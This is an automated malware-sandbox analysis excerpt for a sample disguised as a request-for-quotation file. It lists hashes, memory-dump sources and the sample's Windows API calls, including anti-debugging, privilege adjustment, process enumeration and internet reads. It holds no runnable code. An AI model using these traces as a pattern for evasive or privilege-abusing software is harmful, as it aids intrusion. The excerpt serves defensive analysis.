                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                                                                                              • String ID: .lnk
                                                                                                                                                                                                                              • API String ID: 2683427295-24824748
                                                                                                                                                                                                                              • Opcode ID: 8be31365239305a4f0ecbc96338834b64287ccbcc385a5ffb8382792e3c7b4fb
                                                                                                                                                                                                                              • Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8be31365239305a4f0ecbc96338834b64287ccbcc385a5ffb8382792e3c7b4fb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                                                              • API String ID: 2574300362-192647395
                                                                                                                                                                                                                              • Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                                                                                                                                                                                              • Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
                                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
                                                                                                                                                                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2576544623-0
                                                                                                                                                                                                                              • Opcode ID: 1c9346bdc20ddc0196d8a7451d6206e56d34d46406b44e9c87b55d7262c0256e
                                                                                                                                                                                                                              • Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c9346bdc20ddc0196d8a7451d6206e56d34d46406b44e9c87b55d7262c0256e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen
                                                                                                                                                                                                                              • String ID: ($|
                                                                                                                                                                                                                              • API String ID: 1659193697-1631851259
                                                                                                                                                                                                                              • Opcode ID: eef32c7583b458a7172a6c711d1ec7a4f2f7e3610f1f932fb94fc73443e575d2
                                                                                                                                                                                                                              • Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eef32c7583b458a7172a6c711d1ec7a4f2f7e3610f1f932fb94fc73443e575d2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
                                                                                                                                                                                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 599397726-0
                                                                                                                                                                                                                              • Opcode ID: f5373d92f6f0dc30811b4af31ba5f0bb4595b0a53436f4c0864762cea70d04c2
                                                                                                                                                                                                                              • Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5373d92f6f0dc30811b4af31ba5f0bb4595b0a53436f4c0864762cea70d04c2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B21459
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B21463
                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 00B21470
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                              • Opcode ID: 7528a49ebc0a4df37519d6101491a443caf804a234fdb19dc683bf75bfd99b9a
                                                                                                                                                                                                                              • Instruction ID: c214326d08cfed545fc29b26f80f3636315251428fd124d4f81b1a8a6df6a755
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7528a49ebc0a4df37519d6101491a443caf804a234fdb19dc683bf75bfd99b9a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8231D374901228ABCB21DF68ED8878DBBF8EF18310F5045DAE41CA7250EB309F858F45
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                                                                                                                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1682464887-0
                                                                                                                                                                                                                              • Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                                                                                                                                                                                              • Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                                                                                                • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00458865
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1922334811-0
                                                                                                                                                                                                                              • Opcode ID: 11fd776744e65cad2fb0d65c8c6b7c288e777bf7a622f9fe62c50e0e4f52890d
                                                                                                                                                                                                                              • Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11fd776744e65cad2fb0d65c8c6b7c288e777bf7a622f9fe62c50e0e4f52890d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                                                                                                                                                                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                                                                                                                                                                                                                              • FreeSid.ADVAPI32(?), ref: 0045879B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3429775523-0
                                                                                                                                                                                                                              • Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                                                                                                                                                                                              • Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000003,?,00B23F13,00000003,00B3DE80,0000000C,00B2403D,00000003,00000002,00000000,?,00B22038,00000003), ref: 00B23F5E
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00B23F13,00000003,00B3DE80,0000000C,00B2403D,00000003,00000002,00000000,?,00B22038,00000003), ref: 00B23F65
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00B23F77
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 3f0022902b87a4fc1e13487d74a194af79af9302f1fe6304754bf4b12a637e5e
                                                                                                                                                                                                                              • Instruction ID: 5724455aa9ee7648227c772d13a77bc1bcffad73dbdcbade95e7f57a94f68e2a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f0022902b87a4fc1e13487d74a194af79af9302f1fe6304754bf4b12a637e5e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31E04631404918AFCF21AF28FE08A593BB9EB49B52F044454F8099B122CF39DE93CA80
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __time64.LIBCMT ref: 0046889B
                                                                                                                                                                                                                                • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
                                                                                                                                                                                                                                • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                                                                                              • String ID: 0eL
                                                                                                                                                                                                                              • API String ID: 2893107130-3167399643
                                                                                                                                                                                                                              • Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                                                                                                                                                                                              • Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0046C72B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                              • Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                                                                                                                                                                                              • Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3479602957-0
                                                                                                                                                                                                                              • Opcode ID: 472a7cd9639d892b3363a091e7d83c08bd9bcb7ed13b50b01156cac8ad95666a
                                                                                                                                                                                                                              • Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 472a7cd9639d892b3363a091e7d83c08bd9bcb7ed13b50b01156cac8ad95666a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
